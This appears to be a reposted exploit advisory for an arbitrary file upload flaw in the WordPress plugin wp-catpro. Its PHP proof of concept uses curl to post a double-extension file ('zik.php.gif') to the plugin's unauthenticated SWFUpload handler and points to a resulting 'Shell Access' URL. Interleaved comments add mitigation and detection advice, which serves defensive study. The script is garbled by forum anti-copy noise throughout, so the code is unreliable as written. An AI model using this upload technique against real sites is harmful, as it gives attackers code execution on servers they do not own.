WordPress plugin wp-catpro - Arbitrary File Upload Vulnerability
#------------------------------------------------------------------------
作者 => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png") // Allowed file extensions
# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
#=> Exploit
-----------
! e/ M) k- ]+ ?6 i7 H; [<?php
// Proof of concept exactly as posted; the forum's anti-copy noise is interleaved in
// these lines, so the script is not runnable as shown and is kept that way here.
// Read from the defender's side: it shows that one multipart POST to the plugin's
// bundled SWFUpload handler, carrying no cookie, nonce or credentials, is enough to
// place a caller-named file under the web root.
! P* g# A- b/ t
// Double extension: the name ends in an allow-listed ".gif" (see the extension list
// quoted above the script) yet still contains a ".php" segment. Whether such a file
// executes depends on the web server's multi-extension handling — NOTE(review): confirm
// per deployment; an allow-list that only inspects the trailing extension is the weak check.
4 F! v' h: Y$ N% C# ~$uploadfile="zik.php.gif";; q, f: S4 h* ]. q$ E
// Endpoint: the stock upload.php shipped inside the plugin's swfupload copy, reached
// directly rather than through WordPress's own media handling.
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");+ y# J( J2 C9 I; ?7 |
curl_setopt($ch, CURLOPT_POST, true);, |2 ?0 ]! p q, R7 c. W
// 'Filedata' is the file part; 'folder' is a destination chosen by the client. If the
// handler uses it as-is for the save path, the caller controls where the file lands —
// TODO confirm against the handler source (not on this page).
curl_setopt($ch, CURLOPT_POSTFIELDS,
0 a6 U, f) a8 c& R& p/ h4 j7 Varray('Filedata'=>"@$uploadfile",$ m, r5 p& P6 Q
'folder'=>'/wp-content/uploads/catpro/'));! ?2 `# y% ~9 m! F8 H: Y! O
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);7 g' A" y3 ` J3 d
$postResult = curl_exec($ch);: v0 ^6 t# p- s+ m/ s) c$ k
curl_close($ch);
# r2 c0 y9 t- h6 U& L ; o7 f4 M7 X& H3 g# ]/ e/ Z3 c
// The handler's response is echoed; presumably it carries the stored name under
// wp-content/uploads/catpro/ (the post refers to it as "random_name" below).
print "$postResult";
& }$ v$ x- W7 r/ r $ z0 P$ a- m) q$ g8 @
// Mitigation (handler and deployment): require a WordPress capability check and nonce,
// validate the upload by content rather than by trailing extension, store it under a
// server-generated name with a single extension, and deny script execution in
// wp-content/uploads at the web-server level. Detection: any file with more than one
// extension or a ".php" segment appearing under the uploads tree, and unauthenticated
// POSTs to wp-content/plugins/*/swfupload/*/upload.php in the access logs.
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
" K' Y# X2 ]$ S1 J ?>
) U7 z1 M& Q0 r: D* a<?php
// Body of the uploaded file in the PoC: a probe that, if it renders, shows the uploads
// path executes PHP. For responders, a phpinfo() file under uploads is a common first
// indicator that this class of flaw has been exercised; treat it as a finding, not noise.
( X: {6 m! P, m# S# _$ ^7 Mphpinfo();
) |7 }; _$ S. f6 \" X, o; p8 L?> |